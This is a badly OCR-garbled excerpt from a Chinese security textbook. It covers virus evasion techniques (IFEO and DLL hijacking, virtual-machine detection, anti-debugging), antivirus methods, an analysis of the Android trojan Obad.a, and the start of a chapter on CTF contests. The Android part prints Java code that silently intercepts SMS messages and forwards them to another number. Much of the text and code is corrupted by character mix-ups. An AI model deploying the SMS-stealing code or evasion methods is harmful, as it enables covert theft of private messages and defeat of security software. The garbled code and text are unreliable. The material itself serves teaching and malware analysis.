重 写 WSPConnect 函 数 ， 拦 截 卫 并 且 进 行 跳 转 ，UDP 协 议 下 ， 其 重 写 WSPSend 函 数 ， 替 换 
服务 器 主机 名 。 


| г: J. (B69F34DD-F0F9-42DC-9EDD-95718; ЭВ) ESU) REG_SZ САРгодгат Files (x86)\360\360Safe\safemon\... 
| | РАЙ implemented Catogories 28 ThreadingMod... REG_SZ Apartment 

: | м InprocServer32 

= J Род 

ШЕТ 

| | L. №} VersionindependentProgID 
25-2 (B6AFFB50-6F46-498B1-B912-C3F7A8` 
-月 (86844д97-8802-446е-9846-ЗАВОСС | #188800): 
| >й (B6C0E598-314D-4b63-8C5C-4014F2 
СОРИ 86С2928С-7С88-41ЕЕ-8854-8ЕС926 
229-Ш {b6dc98b1-0bec-45e1-b2e4-3a2d94: 


数值 名 称 M): 
ФА) 


图 9-86 ”加 载 DLL 
2. 映像 /镜像 劫持 


0/8 9): (Image File Execution Options, IFEO) 是 早期 病毒 对 付 杀 毒 软 件 的 一 大 
手段 ， 其 实 也 只 是 使 用 完全 权限 ， 在 注册 表 HKEY LOCAL MACHINE\SOFTWARE\ 
Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 下 新 建 一 个 Debugger 
项 ， 项 的 名 称 为 劫持 的 软件 名 称 ， 如 cmd.exe。 随 后 将 该 项 的 键 值 改 为 一 个 不 存在 的 文 
件 ， 比 如 asdadasdasdasd.exe， 如 图 9-87 所 示 。 


FEO 编辑 还 ) SEV KERA 帮助 H) 


(С) xwsetup. EXE ^ Ят 类 型 数据 

а Your Image Ё11е На GHU) REG_SZ ФН) 

Ey cmd. exe [а] Debugger REG_SZ asdadasdasdasd. exe 
(СД IME Compatibility 


图 9-87 IFEO 
每 当 打 开 cmd.exe 时 ， 系 统 会 先 访问 该 注册 表 下 的 Debugger 键 值 所 指 癌 的 文件 ， 即 
asdadasdasdasd.exe， 而 该 文件 不 存在 时 cmd.exe 目 然 就 无 法 被 打开 ， 同 理 作 用 于 杀毒 软 
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件 ， 这 就 是 病毒 对 抗 杀毒 软件 的 原理 。 
з. DLL 劫持 


操作 系统 在 加 载 DLL 文 件 时 ， 先 会 搜索 程序 所 在 的 目录 ， 帮 没有 则 会 搜索 系统 目录 。 
DLL 劫持 正 是 利用 系统 的 这 个 机 制 ， 在 程序 目录 下 创建 一 个 与 系统 DLL 名 称 、 导 出 函数 相 
同 (为 了 维持 程序 正常 运行 )， 但 是 内 含 病 毒 代 码 的 DLL 文 件 。 当 应 用 程序 加 载 该 DLL 
时 ， 病 毒 代码 也 就 神 不 知 鬼 不 觉 地 运行 了 。 
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鉴于 许多 安全 人 员 通 过 虚拟 机 搭建 蜜 缸 系统 作为 分 析 病 毒 的 强 有 力 手段 ， 病 毒 往往 在 
自身 代码 中 植 入 检测 虚拟 机 的 代码 。 


1. 检测 虚拟 机 的 一 般 手 段 


检测 虚拟 机 的 一 般 手段 主要 是 搜索 相关 VM 虚 拟 机 的 字符 串 ， 如 搜索 虚拟 机 服务 进程 
使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 遍历 进程 ， 来 搜索 
虚拟 机 的 相关 进程 。 
HANDLE WINAPI CreateToolhelp32Snapshot ( // 快 照 
DWORD dwFlags, / /快照 内 容 类 型 
DWORD th32ProcessID // 进 程 ID 
); 


CreateToolhelp32Snapshot A ЖМН ЛЕН ИНТЕ, ЯЖ Войт БОЖЕ 
列表 。 参 数 一 dwFlags 有 如 下 选择 。 

> TH32CS ІМНЕКІТ: 快照 句柄 可 以 被 继承 。 

> TH32CS_SNAPALL: 所 有 的 进程 、 线 程 、 由 th32ProcessID 指 定 的 进程 模块 。 

> TH32CS SNAPHEAPLIST: 由 th32ProcessID 指 定 进程 中 的 堆 。 

> TH32CS SNAPMODULE: 由 th32ProcessID 指 定 进 程 模块 。 

> TH32CS SNAPMODULE32: 由 th32ProcessID 指 定 64 位 程序 进程 中 的 32 位 进程 模块 。 

> TH32CS SNAPPROCESS: 系统 全 部 进程 信息 。 

> TH32CS SNAPTHREAD: 系统 全 部 线程 信息 

本 例 选择 TH32CS_SNAPPROCESS， 而 参数 二 则 设置 为 0， 表 示 无 指定 进程 。 


BOOL ИТМАРТ Process32First( | // 从 快照 中 检索 进程 信息 
HANDLE hSnapshot, // 由 createToolhelp32Snapshot 函 数 返 还 的 句柄 
LPPROCESSENTRY32 1рре // 指 向 PROCESSENTRY32 结 构 体 的 指针 
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参数 二 指向 了 PROCESSENTRY32 结 构 体 。 


BOOL WINAPI Process32Next ( 
HANDLE hSnapshot, 
LPPROCESSENTRY32 lppe 
); 
typedef struct СадРВОСЕЗЗЕМТВУЗ2 | 
DWORD qdwSize;// 结 构 体 大 小 , 使 用 前 必须 使 用 sizeof (РВОСЕЗЗЕМТВУЗ2) 进行 设置 
DWORD сп Озаде; // 进 程 引 用 计数 , 必须 设置 为 1 
DWORD th32ProcessID; // 进 程 ID 
DWORD th32DefaultHeapID; //Ж ІР 


DWORD th32ModuleID; // 进 程 模块 ID, 必须 设置 为 0 

DWORD сп Тргеадз; // 线 程 的 数量 

DWORD th32ParentProcessID; //ХИ ВТО 必须 设置 为 0 

LONG  рсРг1С1аззВазе; / /进程 创 建 线 程 的 优先 级 

DWORD dwFlags; // 预 留 信息 

TCHAR szExeFile[MAX PATH]; ”// 以 null 结 尾 的 字符 串 , 包含 该 进程 的 可 执行 文件 的 文件 名 
DWORD th32MemoryBase; // 可 执行 程序 的 加 载 地 址 

DWORD th32AccessKey; / /控制 进程 地 址 空间 可 见 度 


| РВОСЕЗЗЕМТВУЗ2; 


检测 虚拟 机 具体 流程 则 为 : 


РВОСЕЗЗЕМТВУЗ2 реЗ2; 
pe32.dwSize = sizeof (pe32); // 使 用 结构 体 保存 进程 信息 
HANDLE ҺРгосе555пар =CreateToolhelp32Snapshot (TH32CS 5МАРРКОСЕ55,0); 


// 创 建 快照 


随后 建立 循环 ， 在 使 用 Process32First(hProcessSnap,&pe32)，Process32Next(hProcessSn 
ap,&pe32) 中 间 碍 找 虚拟 机 进程 ， 如 使 用 strcmp(pe32.szExeFile,"VMWwareUserexe" ) 语 句 。 


2. 通过 内 存 来 检测 虚拟 机 


虚拟 机 为 避免 与 物理 主机 神 突 ， 它 在 内 存 映 射 方面 与 物理 主机 存在 差异 ， 因 此 可 以 通 
过 检测 内 存 的 方式 来 检测 虚拟 机 ， 如 检测 IDT (Interrupt Descriptor Table, #23 ) 
的 地 址 ， 其 中 VMware 虚拟 机 中 IDT 地 址 为 0xFFxxxxxx， 而 物理 主机 中 IDT 地 址 不 会 高 于 
0xDOxxxxxx， 因 此 可 以 通过 执行 SIDT 指 令 检 测 IDTR (Interrupt Descripter Table Register, 
中 断 描 述 符 表 寄存 器 ) ，IDTR 用 于 存放 IDT 地 址 ， 然 后 判断 返回 LowIDTbase 的 第 一 个 字 
节 是 否 高 于 0XD0， 以 此 来 检测 虚拟 机 环境 。 
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typedef structt 


WORD IDTLimit; //IDT 的 大 小 

WORD LowIDTbase; ”//IDT 的 低位 地 址 

WORD HiIDTbase; //IDT 的 高 位 地 址 
} ТОТВ; 


同 理 可 以 检测 LDT (Local Descriptor Table， 本 地 摘 述 符 表 ) 与 GDT (Global 
Descriptor Table, + А92) ， 当 LDT 位 于 0x0000 时 ， 为 物理 主机 ; 当 GDT 位 于 
0xFFxxxxxx 时 ， 为 虚拟 主机 。 


3. 其 他 方法 


另外 ， 还 可 以 通过 搜索 “VMware” 字 符 串 来 检测 虚拟 机 的 注册 表 项 ， 进 而 检测 虚拟 
机 是 否 存在 。 此 外 也 可 以 从 物理 硬件 层面 进行 检测 ， 如 检测 网 卡 的 MAC 地 址 、BIOS 等 。 


936 反 调 试 技术 

病毒 侦 测 虚 拟 机 的 同时 ， 也 存在 被 调试 器 分 析 的 风险 ， 因 此 病毒 会 在 自身 代码 中 实现 
反 调试 技术 ， 常 见 的 反 调试 技术 有 以 下 几 种 。 

1. 查询 PEB 


BOOL IsDebuggerPresent (void) 
// 若 程序 处 于 调试 环境 ， 则 返回 TRUE， 否则 返回 FALSE 


BOOL CheckRemoteDebuggerPresent ( 


HANDLE hProcess, // 进 程 句柄 ， 由 GetCurrentProcess 返 回 得 到 
PBOOL pbDebuggerPresent // 用 来 接收 返还 结果 的 布尔 值 参数 
下 / /调试 环境 下 返回 TRUE， 非 调试 环境 下 返回 FALSE 


使 用 之 前 介绍 过 的 NtQueryInformationProcess 妙 数 ， 并 且 将 其 参数 二 设置 为 
ProcessDebugPort (0x7)， 返 回 0 表 明 程序 没有 被 调试 ， 调 试 状 态 下 将 返回 调试 的 端口 号 。 

以 上 三 个 函数 均 采 用 了 检测 PEB 结 构 中 的 BeingDebugged 参 数 信 息 ， 同 样 也 可 以 通过 
汇编 代码 获取 该 信息 。 


int ара; / /声明 整 形变 量 接受 BeingDebugged 的 值 
asmt{ //32 位 系统 环境 

mov еах,Ёѕ: [308] // 定 位 PEB 

mov eax, [eax + 2h] // 定 位 BeingDebugged 

mov dbg,eax / /接收 BeingDebugged 的 值 


} 
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最 后 检测 dbg 的 值 ， 右 dbg 的 值 为 0， 则 表明 非 调试 环境 。 同 样 在 PEB 绪 构 中 被 改变 的 
还 有 一 些 Heap (HE) 标志 ， 如 ProcessHeap、NTGlobalFlag。 


2. 扫描 进程 


程序 可 以 使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 持续 
对 进程 进行 扫描 ， 查 找 如 “ida.exe”“OllyDbg.exe” 之 类 的 调试 软件 ， 也 可 以 直接 使 用 
FindWindow 函 数 进 行 窗口 查找。 


НИКО FindWindow ( 
LPCTSTR lpClassName, // #24 
LPCTSTR lpWindowName // 窗 口 的 名 称 
); 


参数 一 可 以 为 NULL， 参 数 二 中 只 要 包含 调试 程序 名 称 的 部 分 字符 串 即 可 ， 如 
FindWindow(NULL, "оПудЬе "); 即 可 。 


3. 时 间 间 隔 检 测 


这 里 介绍 RDTSC 指 令 。 
RDTSC 指 令 返 回 的 是 自 开 机 以 来 的 CPU 的 周期 数 ， 返 回 的 是 一 个 64 位 的 值 
EDXL:EAX (高 32 位 在 EDX， 低 32 位 在 EAX) ， 那 么 使 用 方法 是 如 下 。 


int time first, time last, time sub 
ЕСЕН 
га! зс 


тоу 七 Ime first， еах 


ER // 部 分 程序 代码 


mov time last, еах 


) 


time sub = time last - time first 


通过 比较 time_sub 的 差 值 是 否 大 于 正常 运行 时 间 ， 从 而 判断 程序 是 否 位 于 调试 环境 ， 
与 之 相似 的 函数 有 : 

DWORD GetTickCount (void) 

BE 01а 250) 210 Н 16 р НУ 1а] Ж, Да) р А. A Н 210 EIA 
法 ， 计 算 时 间 差 ， 判 断 调试 环境 。 
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4 WE 


加 壳 是 运用 加 密 算法 将 程序 压缩 ， 修 改 程序 入 口 点 (Oniginal Entry Point, OEP) ， 加 密 程 
序 源码 ， 在 内 存 中 加 载 时 进行 解码 ， 从 而 阻止 调试 软件 对 程序 代码 在 用 户 层面 的 修改 。 


5. 加 花 


加 “人 花 ” 是 指 加 入 花 指 令 ， 伦 指令 由 一 些 汇 编 语言 组 成 的 干扰 调试 人 员 进 行 分 析 的 代 
码 ， 程 序 能 够 正常 运行 ， 但 会 造成 反 汇 编 出 错 。 
从 源码 上 学 习 完 以 上 小 节 之 后 ， 再 次 请 问 什 么 是 计算 机 病毒 ? 


94 反 病 三 技术 介绍 


9.4.1 特征 码 ( 值 ) 扫描 


首先 我 们 介绍 杀毒 软件 最 传统 的 杀毒 方法 一 一 特征 码 扫 描 。 特 征 码 是 由 反 病 毒 分 机 人 
员 从 病毒 样本 的 中 不 同位 置 提取 的 一 系列 字 节 ， 也 就 是 市 有 病毒 特征 的 一 系列 代码 。 随 后 
这 些 代 码 经 过 严格 的 实验 及 比 对 ， 最 终 将 符合 条 件 的 特征 码 整合 在 一 起 ， 病 毒 库 〈 又 名 特 
征 码 库 ) 由 此 诞生 。 

特征 码 扫描 则 是 使 用 自身 引擎 反 编 译文 件 代 码 ， 并 且 代 码 内 搜索 匹配 是 售 含 有 病毒 库 
中 的 特征 码 和 特征 码 偶 移 的 位 置 ， 进 而 判断 文件 是 否 为 病毒 文件 。 在 病毒 与 杀毒 软件 的 斗 
争 中 ， 病 毒 库 显 然 无 法 及 时 更 新 跟 上 病毒 的 开发 步伐 ， 同 时 也 会 因为 病毒 加 壳 、 加 人 花 免 杀 
从 而 难以 扫描 出 符合 的 特征 色 ， 虽 然 其 后 增加 了 复杂 特征 码 扫描 以 及 隐藏 特征 码 扫 挡 ， 但 
特征 码 扫描 始终 无 法 做 到 “ 快 毒 一 步 ”， 因 此 局 发 式 扫 拉 作为 弥补 特征 码 扫 拉 的 缺陷 而 被 
开发 出 来 。 


9.4.2 ”局 发 式 扫 摘 


局 发 式 扫描 分 为 静态 月 发 式 扫描 与 动态 月 发 式 扫 挡 。 静 态 月 发 式 扫描 以 特征 码 扫描 为 
基础 ， 通 过 反 汇 编 在 不 运行 的 条 件 下 对 目标 文件 进行 特征 指令 扫描 ， 如 果 其 使 用 的 指令 组 
合 与 原先 由 专家 经 验 分 析 得 出 的 病毒 指令 (通常 是 带 有 病毒 性 质 的 API 函 数 的 组 合 ) 相似 
度 遇 ， 束 会 被 判断 为 病毒 程序 。 动 态 局 发 式 扫 摘 则 是 结合 杀毒 软件 内 置 的 虚拟 机 技术 〈 软 
件 模 拟 CPU 等 仿真 环境 ) ， 将 病毒 动态 运行 在 虚拟 机 中 并 检测 其 行为 ， 奉 发 现 类 似 病毒 的 
可 疑 行 为 ， 则 判定 为 病毒 程序 。 

局 发 式 扫 摘 在 未 知 病毒 的 检测 方面 起 到 了 关键 性 的 作用 ， 弥 补 了 特征 码 扫 描 无 法 第 一 
时 间 检 测 最 新 病毒 的 缺陷 ， 当 然 局 发 式 扫 接 存 在 误 报 的 情况 ， 但 很 明显 是 利 大 于 潍 了 。 
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为 了 起 到 实时 、 主 动 防护 病毒 入 侵 的 作用 ， 主 动 防御 技术 打破 了 传统 杀毒 软件 检测 
特征 码 的 思路 。 首 先 它 在 驱动 内 核 层 次 加 载 自 身 ， 从 而 避免 目 身 进程 在 用 户 层面 被 病毒 终 
Ж; 其 次 ， 就 像 之 前 介绍 的 键盘 钩子 HOOK， 主 动 防御 技术 在 操作 系统 中 HOOK 了 一 些 病 
毒 常用 的 API 函 数 ， 每 当 有 程序 使 用 这 些 API 函 数 的 时 候 ， 它 会 根据 程序 使 用 的 API 函 数 以 
及 伴随 这 些 API 函 数 做 出 的 行为 推测 该 程序 是 否 为 病毒 ， 进 而 做 到 实时 监控 。 

主动 防御 技术 避免 了 在 用 户 在 不 知情 的 情况 下 运行 病毒 ， 并 且 对 未 知 病毒 也 起 到 了 一 
定 的 防范 作用 。 同 时 ， 如 360 安 全 卫士 等 杀毒 软件 在 主动 防御 技术 中 也 增添 了 漏洞 实时 修 
补 功 能 ， 杜 绝 了 病毒 通过 漏洞 入 侵 计 算 机 。 


944 REX 


由 于 传统 杀毒 方法 的 病毒 库 巨 大 以 及 杀毒 内 存 开销 大 等 缺 扣 ， 云 得 杀 将 成 为 未 来 杀毒 
软件 的 主流 趋势 。 云 得 杀 将 特征 码 库 人 存 于 服务 器 疹 ， 在 得 杀 时 通过 安全 公司 的 “ 云 计 算 ” 
手段 ， 实 现 了 在 短 时 间 内 迅速 租 杀 以 及 云 站 病毒 库 快 速 更 新 ， 但 其 缺点 是 需要 保证 一 个 畅 
通 无 阻 的 网 络 环境 ， 并 且 有 隐私 泄露 的 危险 。 


9.5 Android 木马 


随 看 智能 手机 的 普及 ， 移 动 互联 网 已 然 成 为 了 生 ЖБ % @ ^ш 18:17 
iah An] РН А2. «ЕН ХАПЫК Е, РАМН 81 com.android.system.ad.. 
毒 的 黑色 产业 链 便 慢 慢 出 现 了 。 手 机 病毒 的 目的 非常 简 
单 ， Вр 是 通过 获取 用 户 隐私 来 牟利 Do уои want to э this application? 

大 多 数 手机 病毒 都 有 共同 的 特性 ， 窃 取 用 户 信息 并 Wapo a 
悄悄 向 增值 服务 号 码 发 送 短信 ， 自 启动 以 及 高 隐蔽 性 。 гали и 


前 两 年 出 现 了 一 种 被 称 为 “Backdoor.AndroidOS. ° зене Pia ос connections h 
Obad.a” 的 极 具 代表 性 的 Android 木 马 ， 如 图 9-88 所 示 。 Your personal information 
该 木马 利用 了 当时 “Android 操 作 系统 此 前 位 置 的 漏洞 来 ка окш нус; 
提升 程序 的 权限 ， 并 且 能 够 阻止 被 卸载 ”。 到 底 为 什么 DC 
这 个 木马 如 此 强大 呢 ， 于 是 手机 安全 专家 们 就 对 其 展开 Phone calls 
了 深度 剖析 。 теди йет 


Services Ша! cost уои money 
) tly са! ( bi ' 


(1) ЖЖ НА Ak РЕЗЕ те та» ARABE ЕЛЕСІ М$ тезза 
木马 的 代码 复杂 烦琐 得 多 。 显 然 ， 复 杂 的 代码 并 不 足 这 Ша 
款 木 马 唯 一 神奇 的 地 方 。 Cancel Install 
(2) Odab.a 的 AndroidManifest.xml 文 件 也 非常 精 图 9-88 ”安装 界面 
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妙 ， 木 马 作 者 在 对 Android 的 漏洞 挖掘 及 利用 之 后 ， 使 用 了 非 谷 歌 标准 的 AndroidManifest. 
xml 文 件 〈 见 图 9-89) ， 并 使 其 能 够 正常 被 智能 手机 运行 。 


<application =".СОсСсс1"> | 


<activity ="System" -".ССОІО11"> 
<intent-filter> 
<action android:name=w="android.intent.action.MAIN" /> 
<category android:name=w"android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
<activity w="System" =".cCoIOIOo" ="в1п91еТор" /> 
<service =".OCOcCO11" /> 
<receiver ="System" =".ОС11СоО" ="android.permission.BIND ПЕУТСЕ АОМТЫ"> 
<meta-data ="android.app.device admin" ="@хш1/ссс1осс" /> 
<intent-filter> 
<action android:name=w="com.strain.admin.DEVICE ADMIN ENABLED" /> 
</intent-filter> 


<service =".MainService" /> 
<receiver =" .10О1СОсї"> 
<іпбепе-Ғі1сес ="1000"> 
<action апдгоідіпалет"амігоій.іпбсепе.асбсіоп.ВООТ COMPLETED” /> 
<action android:name=w"android.intent.action.QUICKBOOT РОМЕВОН" /> 


图 9-89 AndroidManifest.xml 文 件 


(3) 该 木马 通过 对 指令 代码 进行 特殊 处 理 ， 从 而 阻止 反 编 译 。 该 木马 除了 对 代码 进 
行 加 密 处 理 以 外 ， 还 通过 对 指令 代 人 码 进行 特殊 处 理 ， 使 得 安全 公司 常用 的 Java 反 编译 工具 


4% -, = = 


lasses-dexzjarjar (3 


ЕВ com_android 
> Ë internal.telephony 
Y 83 system.admin 
» ІЛ ссоюй 
П сспосс 
Ш скоксо 


[Л ксосс 

Ш) ІШІСІ 

ІЛ lololol 

ІЛ MainService 
Л ОСІСООСІ 
Ш) ососсой 
M Aran 


P 
P 
Е 
» 
P 
» 
> | 
> 
P 
> 
> 
» 
> | 
> 
b 
> 
P 
P 
> 
> 
P 
P 
> 
+ 


〈 见 图 9-90) 无 法 正确 地 反 编 译 其 指令 ， 增 加 了 对 木马 的 分 析 难 度 。 


CClIOccclass 6) CICoICCo.class | 


byte[] arroyOfByte2 = new byte[j]; 
int k = 0; 
int m; 
if (arrayOfBytel == null) 
пе j; 
for (int n = рагатіл%2; ; п < arrayO0fBytel[paramInt2]) 
( 
рогат?! 2 ++; 
i = -4 + (m + n); 
array0f8yte2[k] = ((byte)i); 
k++*; 
if (k >= j) 
return new String(orrayOfByte2, 0); 
n-i; 
} 
} 


// ERROR // 
public final void гип() 
{ 
// Byte code: 
9: invokestatic 168 java/l<loang/System:currentTimeMillis O 
: |збоге. 1 
: пет 154 java/lang/ String 
?: дир 
: bipush 19 
19: sipush 498 
13: Бъризп 236 
15: зпиокез а ъс 170 сот/ апйготд/ зузрет/абтп/ ССПОсе: СИС (TII)Ljavo/long/S 
18: trnvokestatic 175 соз/агфго14/5$у5$%ет/айтп/оСТ1С11:оС11С11 (| зауа/|апа/ га па 


89-90 ”Java 反 编 译 工具 


(4) 此 木马 无 法 被 删除 。Android 系 统 从 2.2 版 本 开始 ， 提 供 了 一 个 “设备 管理 器 ”的 
功能 ， 其 初衷 是 为 企业 部 署 远 程 IT 控 制 使 用 ， 为 了 防止 员工 私自 卸载 企业 安装 的 “设备 管 
理 器 ”， 一 有 旦 激活 设备 管理 器 之 后 ， 该 设备 管理 器 就 不 可 删除 〈 见 图 9-91) 。 但 是 ， 由 于 
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Android 系 统 对 此 功能 设计 得 不 完善 ， 使 得 木马 可 以 利用 这 个 机 制 ， 让 目 己 注册 成 为 一 个 
АРНАТ, ЛЕНЕ Р. 

(5) 一 旦 用 户 不 慎 “激活 ”木马 ， 它 就 被 注册 成 了 设备 管理 器 ， 此 时 该 木马 的 “ 强 
行 停止 ”和 “ 番 载 ”按钮 将 完全 失效 ， 即 木马 无 法 关闭 且 无 法 番 载 。 另 外 由 于 设备 管理 需 
的 权限 以 及 木马 目 身 使 用 非 标准 的 手段 来 注册 设备 管理 器 ， 所 以 即使 Android 让 它 注册 成 
功 了 ， 它 也 不 会 在 设备 管理 器 列表 中 显示 ， 用 户 因此 找 不 到 取消 注册 设备 管理 器 的 入 口 ， 
便 无 法 取消 此 木马 的 权限 ， 如 图 9-92 所 示 。 


| | 要 激活 设备 管理 器 吗 ? 


“ 
е System 


\tte ае СРЯДА TES the аррис: 
adm ес 


КЕ 此 管理 器 可 4/ ст 秆 应 
РА" ‘android.s em.admin" 执 行 以 下 操作 : 


制 屏 幕 锁 定 的 方式 和 时 间 


没有 可 供 显 示 的 设备 管理 器 


图 9-91 激活 界面 图 9-92 木马 注册 后 ,设备 管理 器 显示 “没有 可 供 
显示 的 设备 管理 器 ” 


通过 以 上 分 析 发 现 ， 如 果 用 户 在 最 开始 不 给 予 木 马 权 限 的 话 ， 那 么 它 就 不 会 造成 很 大 
的 危害 ， 所 以 ， 民 好 的 手机 使 用 习惯 是 目 己 不 “中 招 ” 的 最 重要 的 环节 ， 建 议 : 

> 不 要 随便 安装 来 源 不 可 靠 的 软件 ; 

> 不 要 随便 给 予 不 可 靠 软 件 设备 权限 ; 

> 习惯 性 地 检查 手机 文件 ， 看 看 有 没有 可 疑 文件 ; 

> 安装 软件 之 前 ， 仔 细 查 看 该 软件 需要 哪些 权限 并 且 是 否 确 实 需要 这 些 权 限 才 能 运 

行 APP 完 整 功能 。 
下 面 ， 附 上 安 早 短信 发 送 代码 : 


раскаде сот.апаго1а.зегу1се; 


import jJava.text.SimpleDateFormat; 
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import 
import 
import 
import 
import 
import 


import 


жон 病毒 不 神秘 人 ШЕ 


апагоіа.аппоёаіёіоп. Ѕ5ирргеѕѕііпі; 
апаго1іа. сопёепі .Вгоаасаѕіёвесеіуег; 
апагоіа. сопёепі .Сопіехі; 

апаго1іа. сопіепі .Іпіёепі; 
апагоіа.оѕ.Випа1е; 
апагоіа.ёе1ерһопу. $т5Мападег; 


апагоіа.ёе1ерһопу.5ют5Меѕѕаде; 


public class а extends ВгоаасаѕіКесеіуег | 


public static final String SMS RECEIVED ACTION = 


"android.provider.Telephony.SMS RECEIVED"; 


@SuppressLint ("SimpleDateFormat") 


@Оуегг1 ае 


public void опВесетуе (Context context, Intent intent) | 


Bundle bundle = intent.getExtras (); 


Object [] objects = (Object[]) bundle.get ("pdus"); 


for (Object obj : objects) { 


// 注 册 SmsMessadge 
SmsMessage smsMessage=SmsMessage.createFromPdu ( (byte[]) obj); 
String body = smsMessage.getDisplayMessageBody (); 
String addres = smsMessage.getDisplayOriginatingAddress (); 
long date = smsMessage.getTimestampMillis (); 
// 格 式 化 时 间 
SimpleDateFormat format = new SimpleDateFormat ( 
"Yyyy MM-dd hhimmi:5Ss"); 

String datestr = format.format (date); 
System.out.printin (addres + ":" + dateStr + ":" + body); 
// 拦 截 指定 号 码 短信 
if (ад9гез.едпа15 ("5554")) { 

abortBroadcast (); 

SmsManager smsManager = SmsManager.getDefault(); 

// 回 传 短信 到 指定 号 码 

зшзМападег - зепдТехтМеззаде ("5556", null, addres + ":" 


1 пасезег рота о аа ВЕ 
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} 


安里 的 短信 都 是 按 广 播 的 形式 处 理 ， 所 以 只 需要 对 广播 进 行 监听 就 可 以 ， 当 BroadcastReceiver 
优先 级 大 于 其 他 的 BroadcastReceiver 的 优先 级 的 时 候 ， 便 可 以 使 用 abortBroadcast(O 来 将 此 
广播 拦截 ， 使 其 他 APP 无 法 接收 到 此 广播 。 


<!-- 注册 receive 并 设置 优先 级 --> 
<гесетуег android:name="com.android.service.a" android:exported="false"> 
<intent-filter android:priority="10000"> 
<action android:name="android.provider.Telephony.SMS 
RECEIVED"/> 
</intent-filter> 


</гесетуег> 


9.6 Жл 


本 章 首 先 介 绍 了 计算 机 病毒 的 起 源 以 及 发 展 过 程 ， 帮 助 谈 者 了 解 了 什么 是 计算 机 病 
毒 。 然 后 通过 行为 分 析 手 段 来 讲解 各 种 病毒 分 析 工 具 的 使 用 方法 ， 从 而 使 读者 更 加 透彻 地 
了 解 计 算 机 病毒 的 行为 ， 绸 从 代码 层面 揭 开 计算 机 病毒 神秘 的 面纱 。 接 下 来 介绍 了 计算 机 
病毒 的 其 他 常用 技术 手段 、 反 分 析 手 段 和 杀毒 软件 技术 原理 ， 从 其 他 方面 揭示 计算 机 病毒 
的 本 质 其 实 就 是 一 些 API 函 数 的 连 招 组 合 。 最 后 分 析 了 一 个 安 日 病 毒 实 例 ， 随 看 移动 手机 
的 普及 ， 手 机 病毒 也 成 为 未 来 病毒 发 展 的 重要 趋势 ， 加 上 大 多 数 人 对 移动 设备 病毒 的 防御 
意识 薄弱 ， 更 让 恶意 黑客 有 机 可 乘 。 要 防御 病毒 的 攻击 ， 就 要 求 储备 更 多 的 安全 知识 。 通 
过 本 章 的 学 习 ， 读 者 会 发 现 病毒 其 实 并 不 神秘 ， 只 要 我 们 怀 看 一 份 探索 未 知 〈 不 仅仅 是 计 
算 机 安全 ) 的 热忱 ， 一 份 对 于 知识 的 强烈 渴求 ， 通 过 不 断 钻 研 ， 定 能 有 所 突破 。 


— 242 — 


= == пана f 


安全 技术 拓展 一 一 CTF 


тея 


- ЯҒ. 


га 


МДҮ ЧА 黑客 与 安全 技术 指南 


安全 领域 的 知识 博大 精深 ， 几 乎 没有 人 能 掌握 全 部 的 知识 技能 ， 想 要 学 习 更 多 的 知 
识 ， 就 一 定 不 能 局 限于 茶 一 领域 。 本 章 将 讲解 一 项 在 安全 领域 比较 前 沿 的 范 赛 一 一 CTF。 


101 CTF 简介 


СТЕ (Capture Тһе Flag) 一 般 译作 夺 旗 赛 ， 它 作为 信息 安全 领域 选拔 人 才 和 互相 比拼 
技能 水 平 的 比赛 ， 夺 旗 赛 被 越 来 越 多 的 人 所 关注 。 这 种 比赛 形式 起 源 于 1996 年 的 DEFCON 
全 球 黑 客 大 会 ， 这 次 大 会 上 用 虚拟 夺 旗 竞赛 的 形式 代替 之 前 黑客 之 间 的 真实 攻击 。CTF 
现在 已 经 成 为 全 球 范围 网 络 安全 圈 流 行 的 竞赛 形式 。DEFCON 作 为 CIF 赛 制 的 发 源 地 ， 
DEFCON CTF 也 成 为 了 代表 目前 全 球 最 高 技术 水 平和 影响 力 的 CIF 竞 赛 。 


10.1.1 CTF 的 三 种 竞赛 模式 


CTF 竞 赛 模式 分 为 以 下 三 类 。 
1. 解 题 模式 ( Jeopardy ) 


参赛 队伍 可 以 通过 互联 网 或 者 现场 的 网 络 参与 ， 这 种 模式 的 CTF 竞 赛 与 ACM 编 程 竞 
赛 、 信 息 学 奥赛 比较 类 似 ， 以 解决 网 络 安全 技术 挑战 题目 的 分 值 和 时 间 来 排名 ,通常 用 于 
在 线 选 拔 赛 。 题目 主要 包 仿 逆向、 漏洞 挖 据 与 利用 、Web 渗 透 、 密 码 、 取 证 、 隐 写 、 安 全 
编程 等 ， 这 也 是 新 手 最 早 也 是 最 容易 接触 到 的 CTF 竞 赛 模式 。 


2. 攻防 模式 ( Attack-Defense ) 


在 攻防 模式 CITF 赛 制 中 ， 参 赛 队伍 在 网 络 空间 互相 进行 攻击 和 防守 ， 挖 掘 网 络 服务 漏 
洞 并 攻击 对 手 服务 来 得 分 ， 通 过 修补 自身 服务 漏洞 进行 防御 来 避免 丢 分 ， 这 多 数 出 现在 线 
下 比赛 中 。 攻 防 模式 CTF 赛 制 可 以 实时 通过 得 分 反映 出 比赛 情况 ， 最 终 也 以 得 分 直接 分 出 
胜 负 ， 是 一 种 竞争 激烈 、 具 有 很 强 的 观 贫 性 和 高 度 透明 性 的 网 络 安全 赛制 。 在 这 种 赛制 
中 ， 不 仅仅 是 比 参 赛 队 员 的 智力 和 技术 ， 由 于 时 间 较 长 ， 所 以 对 成 员 的 体力 要 求 也 比较 车 
刻 ， 同 时 也 是 对 团队 之 间 的 分 工 配合 与 合作 的 考验 。 


3. 混合 模式 


混合 模式 是 结合 了 解 题 模 式 和 攻防 模式 的 新 型 CTF 竞 赛 模式 ， 现 已 被 越 来 越 多 的 比赛 采 
用 ， 由 于 其 可 以 发 挥 团队 成 员 在 各 个 领域 的 专长 ， 这 种 新 的 范 赛 模式 被 越 来 越 多 的 人 所 接受 。 


~ 


10.12 ”知名 CTF 竞 赛 


在 介绍 知名 CTF 竞 赛 之 前 ， 先 来 认识 一 个 网 站 一 一 CTFTIME (https: //ctftime. 
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org/) ， 如 图 10-1 所 示 ， 这 是 一 个 比较 全 面 提供 CTF 信 息 的 网 站 。 


З CTFtime.org / All about х № 

= > С ËB https://ctftime.org 

Мое masma) qS, 开始 
Теат гайпа Past events a 


НҢ Altay СТЕ 2015 
АВ 22, 18:00 UTC | Ваташ, Russian Federation 


2015 2014 2013 2012 2011 


HITB CTF Amsterdam 2015 
АВ 29, 15:00 UTC | Amsterdam, The Netherlands 

